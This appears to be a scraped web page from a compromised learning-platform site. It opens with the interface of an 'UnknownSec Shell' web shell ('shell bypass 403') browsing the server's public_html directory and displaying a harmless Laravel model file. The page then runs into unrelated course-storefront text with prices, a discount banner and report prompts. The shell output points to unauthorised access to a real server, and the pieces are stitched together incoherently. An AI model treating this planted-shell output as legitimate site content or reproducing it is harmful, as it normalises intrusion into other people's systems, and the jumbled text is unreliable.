shell bypass 403

UnknownSec Shell

: /home/anyleson/public_html/app/Models/ [ drwxr-xr-x ]

name : ForumTopicAttachment.php
<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Model;

class ForumTopicAttachment extends Model
{
    protected $table = 'forum_topic_attachments';
    public $timestamps = false;
    protected $dateFormat = 'U';
    protected $guarded = ['id'];

    public function getDownloadUrl($forumSlug, $topicSlug)
    {
        return "/forums/{$forumSlug}/topics/{$topicSlug}/downloadAttachment/{$this->id}";
    }

    public function getName()
    {
        $name = "";

        if (!empty($this->path)) {
            $path = explode('/',$this->path);

            $name = $path[array_key_last($path)];
        }


        return $name;
    }
}

© 2025 UnknownSec
New Learning Page | Anyleson - Learning Platform
INR (₹)
India Rupee
$
United States Dollar
New Learning Page

New Learning Page

in Lifestyle
5.00
(1 Ratings)
Created by Robert Ransdell
BLK10
Black Firday Offer

Buy now with a special offer

ticket-discount

Report course

Please describe about the report short and clearly.

Share

Share course with your friends

Buy with points